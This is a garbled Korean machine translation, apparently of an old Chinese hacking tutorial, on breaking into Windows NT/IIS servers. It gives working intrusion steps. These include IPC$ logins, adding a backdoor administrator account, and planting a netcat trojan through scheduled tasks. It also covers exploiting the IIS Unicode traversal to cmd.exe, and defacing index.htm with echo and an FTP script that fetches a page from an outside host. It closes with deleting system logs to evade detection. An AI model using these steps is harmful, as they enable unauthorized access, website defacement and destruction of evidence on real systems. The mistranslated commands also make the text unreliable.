호스트 huc
1:NET
IP 의 사용자 이름과 암호가 있는 한 IPC$ 로 연결하십시오!
여기, 만약 당신이 hbx 를 받는다면, 비밀번호는 123456 입니다. 상대방의 IP 가 127.0.0. 1 이라고 가정합니다.
순 사용량 \ \127.0.0.1\ IPC $123456/사용자: hbx
종료 명령은 다음과 같습니다
순 사용량 \ \127.0.0.1\ IPC $/delte
다음 작업을 사용하려면 먼저 로그인해야 합니다. 로그인 방법은 위와 같습니다.
--
먼저 SA 의 권한이 시스템의 수퍼유저와 같기 때문에 사용자를 만드는 방법을 설명합니다.
Lovechina 라는 흑백 사용자 암호를 추가했습니다.
네티즌 흑백 lovechina /add
명령이 성공한다는 것을 보여주기만 하면 우리는 그를 관리자 그룹에 추가할 수 있다.
Net 로컬 그룹 관리자 흑백/추가
--
여기서 말하는 것은 상대방의 CD 를 매핑하는 것입니다. 물론 다른 접시도 가능합니다. 존재만 하면 됩니다. 여기서 우리는 상대방의 CD 를 현지에 매핑한다.
Z 디스크.
순 사용 z:\\ 127.0.0. 1\c 달러
--
Net start telnet
이렇게 하면 상대방의 텔넷 서비스가 열립니다.
--
여기는 손님 활성화 사용자입니다. 게스트 는 NT 의 기본 사용자이므로 삭제할 수 없습니다. 나는 이것이 사실인지 모르지만, 나의 2000 은 단지
삭제할 수 없습니다.
네트워크 사용자 게스트/활동: 예
--
다음은 한 사용자의 비밀번호를 변경하는 것입니다. 게스트의 비밀번호를 lovechina 로 변경하겠습니다. 다른 사용자도 그렇게 할 수 있습니다. 네가 권리가 있는 한
제한하시면 됩니다!
네티즌 게스트 러브 치나
그물 명령은 정말 강력합니다!
2: 에서
일반적으로 침입자가 침입한 후 뒷문을 남기는 것은 트로이마의 일종이다. 네가 트로이의 말을 건네면, 너는 어떻게 그것을 발동할 수 있니?
그런 다음 서버에 이미 로그인했다고 가정하고 AT 명령을 사용해야 합니다.
먼저 상대방의 시간을 얻어야 합니다.
순시간 \\ 127.0.0. 1
시간이 12: 1 이라고 가정하는 시간이 반환됩니다. 이제 ID= 1 인 새 작업을 만들어야 합니다.
Nc.exe 에서
다른 서버에 있을 named 라는 트로이를 가정해 봅시다.
다음은 NC 를 소개하겠습니다. NETCAT 의 약칭입니다. 쉽게 입력할 수 있도록 일반적으로 이름을 바꿉니다. 이것은 텔넷 서비스와 포트입니다.
99 입니다.
12:3 에 도착하면 상대방의 99 번 입구에 연결할 수 있습니다. 이것은 상대방을 위해 트로이 말 한 마리를 심었다.
3: 원격 로그인
이 명령은 매우 실용적이어서 먼 곳에 연결할 수 있지만, 정상적인 상황에서는 비밀번호와 사용자가 필요하지만, 너는 오히려 상대방에게 트로이마를 심었다.
트로이 목마가 열린 포트에 직접 연결하십시오.
원격 로그인 127.0.0. 1 99
이렇게 하면 상대방의 포트 99 에 연결할 수 있다. 그런 다음 다른 쪽에서 명령을 실행할 수 있습니다. 바로 육계입니다.
4:FTP
여러분의 물건을 상대방의 컴퓨터에 전달할 수 있고, FTP 업로드를 지원하는 공간을 신청할 수 있습니다. 중국에는 많은 것들이 있습니다. 사실이라면.
나는 그것을 찾을 수 없다. 저는 www.5 1 을 주었습니다. 넷, 어느 게 좋을까요? 신청할 때 사용자 이름, 암호 및 FTP 서버를 제공합니다.
업로드하기 전에 로그인해야 합니다. 여기서는 FTP 서버가 www.5 1 이라고 가정합니다. NET, 사용자 이름은 HUCJS 이고 암호는 65432 1 입니다.
파일 전송 프로토콜 (File Transfer Protocol 의 약자)
HTTP _ CONNECTION = 활성 상태로 유지
HTTP_HOST= 현재 로그인된 IP. 내 IP 가 원래 여기에 표시되었지만 삭제했습니다.
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (호환 : MSIE 5.0 창 98; DigExt) 를 참조하십시오
프로세서 수 = 1
Os2libpath = d: \ winnt \ system32 \ os2 \ dll;
OS=Windows_NT
Path = D:\ WINNT \ system32;; 딩: \WINNT
PATHEXT=. COM 입니다. EXE. 박쥐; 。 탄광관리국
PATH_TRANSLATED= e: \ PATH_TRANSLATED= 뒤에 홈 페이지가 오는 한 vlroot 홈 페이지가 배치되는 주소입니다.
주소를 쓰다. 이것은 E:\vlroot 입니다.
프로세서 아키텍처 =x86
PROCESSOR_IDENTIFIER=x86 시리즈 6 모델 3 스테핑 3, 정품 인텔
프로세서 수준 =6
프로세서 버전 =0303
프롬프트 =$P$G
QUERY_STRING=/c+set
원격 ADDR=XX 입니다. XX.XX.XX
원격 호스트 =XX 입니다. XX.XX.XX
요청 메서드 = 가져오기
스크립트 이름 =/스크립트/..% 2f ../winnt/system32/cmd.exe
SERVER_NAME=XX 입니다. XX.XX.XX
서버 포트 =80
서버 포트 보안 =0
Server _ protocol = http/1.1
Server _ software = Microsoft-IIS/3.0 상대방이 IIS/3.0 을 사용하고 있습니다.
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
User profile = D:\ WINNT \ 프로필 \ 기본 사용자
윈디어 =D:\WINNT
파우더 라인은 상대 홈페이지의 저장 주소입니다. 여기에는 한 가지 비결, 어리석은 비결이 있지만, 너는 이 면만 사용할 수 있다.
방법 100% 에서 홈페이지의 이름을 찾을 수 있습니다. DIR 이 디렉토리를 찾을 때 많은 파일을 볼 수 있습니다. 모든 파일을 넣을 수 있습니다.
브라우저 입력 파일 이름 XX. XX.XX.XX 이렇게 하면 어떤 XX 와 똑같이 생긴다면. XX. XX 가 봤어요. 그럼 이게 첫 페이지의 이름이에요.
7: 국가통계청
NT 컴퓨터를 스캔하고 136 ~ 139 포트 중 하나가 열려 있는 경우 이 명령을 사용하여 사용자를 가져옵니다. 참, NetBIOS 입니다. 아이디를 받으면 비밀번호를 짐작할 수 있어요. 예를 들어, 비교적 간단한 암호, 암호, 사용자 이름과 마찬가지로 모두 시도해 보세요. 안 되면 폭력으로 해독할 수 있습니다!
현재 인터넷상의 많은 NT 컴퓨터에는 이러한 포트가 있습니다. 너는 연습할 수 있다, 우리는 결과를 분석할 것이다.
순서는
Nbtstat -A XX 입니다. XX.XX.XX
-A 는 대문자여야 합니다.
이것이 결과입니다.
NetBIOS 원격 시스템 이름 테이블
이름 유형 상태
--
등록 등록 등록 등록 등록 등록 등록 등록
등록
MAC 주소 = 00-E0-29- 14-35-BA
펜티엄 & lt00 & gt 고유
펜티엄 & lt20 >;; 유니크하다
오라호돈 & lt00 & gt 그룹
오라호돈 & lt1c > 그룹
오라호돈 & lt1b > 유니크하다
펜티엄 & lt03 & gt 고유
인터넷 ~ 서비스 <. 1c > 그룹
IS ~ 펜티엄 II...& lt00 & gt 유일무이하다
오라호돈 & lt1e > 그룹
오라호돈 & lt1d > 유니크하다
.. __MSBROWSE__. & lt01> 그룹
분홍색은 이 시스템에 로그인한 사용자입니다. 어쩌면 당신은 그것을 보는 방법을 모른다. 혹시 숫자를 본 적이 있습니까? 이 숫자가
여기 사용자는 펜티엄 ii 입니다.
8: 시스템 종료
상대방의 NT 서버를 종료하는 명령입니다.
종료 \\IP 주소 t:20
20 초 후에 자동으로 NT 를 끄고 심사숙고해야 이 명령을 실행할 수 있어 상대방에게 큰 손해를 입힐 수 있다. 양심이 있는 침입자가 되다.
9:DIR
이 명령은 할 말이 별로 없지만 중요하다. 한 디렉토리에 있는 모든 파일과 폴더를 보는 것입니다.
현지에서 시도해 볼 수 있습니다.
10: 에코
유명한 허점 유니코드, 이 명령은 이 허점을 이용하여 호스트를 해킹할 수 있다.
우리가' 난징 대학살 철증 산' 을 가져간다고 가정해 봅시다. 어떤 일본인도 부인할 수 없습니다! " Index.htm 을 쓰는 방법에는 두 가지가 있습니다. 무엇이 다른지 봅시다.
에코 난징 대학살의 철증은 산과 같아서 어떤 일본인도 부인할 수 없다! & gtindex.htm
에코 난징 대학살의 철증은 산과 같아서 어떤 일본인도 부인할 수 없다! & gt& gtindex.htm
첫 번째는 인덱스. HTM 의 원문 내용을 덮어두고 "난징 대학살은 철증 산처럼, 어떤 일본인도 부인할 수 없다!" 라는 뜻이다.
Index.htm 에 글을 씁니다.
두 번째는 "난징 대학살의 철증은 산과 같아서 어떤 일본인도 부인할 수 없다!" 라는 뜻이다. " Index.htm 에 추가합니다.
"> > 에서 생성된 내용은 파일에 추가되고," > "그 원본 파일의 내용은 덮어쓰여집니다.
현지에서 시도해 볼 수 있습니다.
어쩌면 당신은, 이 간단 하 고 어두운 환경에 대 한 재미가 무엇 인지 물어 봐도 될까요? 사실 홈페이지를 상대 디렉토리로 다운로드하는 데 사용할 수 있다.
1. 우선 무료 홈페이지 공간을 신청해야 합니다.
2. echo 를 사용하여 쓰기 가능 디렉토리에 다음을 포함하는 txt 파일을 생성합니다. (chinren 서버를 예로 들어. ) 을 참조하십시오
Upload.chinaren.com 을 엽니다.
Cnhack (신청 시 사용자 이름)
테스트 (요청 시 암호)
Index.htm c: \ inetpub \ wwwroot \ index.htm (여기서는 여러분의 공간에 있는 index.htm 을 상대방에게 다운로드하는 것입니다.
C:\inetpub\wwwroot\index.htm)
Bye (FTP 대화 종료, 98 의 DOS 에 해당, EXIT 를 사용하여 DOS 종료)
구체적인 방법:
Echo openupload.chinaren.com c: \ kr hack.txt 를 입력합니다
Echo cnhack > & gtc:\cnhack.txt 를 입력합니다
Echo 39abs > & gtc:\cnhack.txt 를 입력합니다
Echo getindex.htm c: ₩ inetpub ₩ wwwroot ₩ index.htm+> > 를 입력합니다 +c:\cnhack.txt
마지막으로 FTP -s: c: ₩ cnhack.txt 를 입력합니다 (FTP 의-s 매개변수를 사용하여 파일 내용 실행). ) 을 참조하십시오
명령이 완료되면 지정한 파일로 파일이 다운로드됩니다.
참고: 파일을 가져온 후 cnhack.txt 를 삭제하십시오. 삭제하지 않으면 다른 사람이 너의 비밀번호를 쉽게 볼 수 있다. ) 을 참조하십시오
Del c:\cnhack.txt 를 기억하십시오
1 1: 속성
이 명령은 파일 속성을 설정합니다. 홈페이지의 파일 속성이 읽기 전용으로 설정되어 있는 웹사이트를 검게 하고 싶다면 불쌍하다. 삭제하거나 덮어쓸 수 없습니다. 쓰러지다! 하지만 이 명령을 두려워하지 마세요.
Index.htm 등록 정보
이 명령은 index.htm 의 읽기 전용 속성을 제거하는 데 사용됩니다.
-'를'+'로 변경하면 파일의 속성이 읽기 전용으로 설정됩니다.
--
Index.htm 등록 정보
이 명령은 index.htm 의 속성을 읽기 전용으로 설정합니다.
12 델
이 제목을 보고 쓰러지지 마라! 이제 127.0.0. 1 을 떠나야 합니다. 로그를 삭제하려면, 당연히 삭제해야 한다! 잡히고 싶어요. 하하.
NT 의 로그는 다음과 같습니다
Dell c: \ winnt \ system32 \ logfiles \ *. *
Dell c: \ winnt \ system32 \ config \ *. 등점도 온도
Dell c: \ winnt \ system32 \ dtclog \ *. *
Dell c: \ winnt \ system32 \ *. 통나무
Dell c: \ winnt \ system32 \ *. 텍스트 파일 (textfile)
Del C:\winnt\*. 텍스트 파일 (textfile)
Del C:\winnt\*. 통나무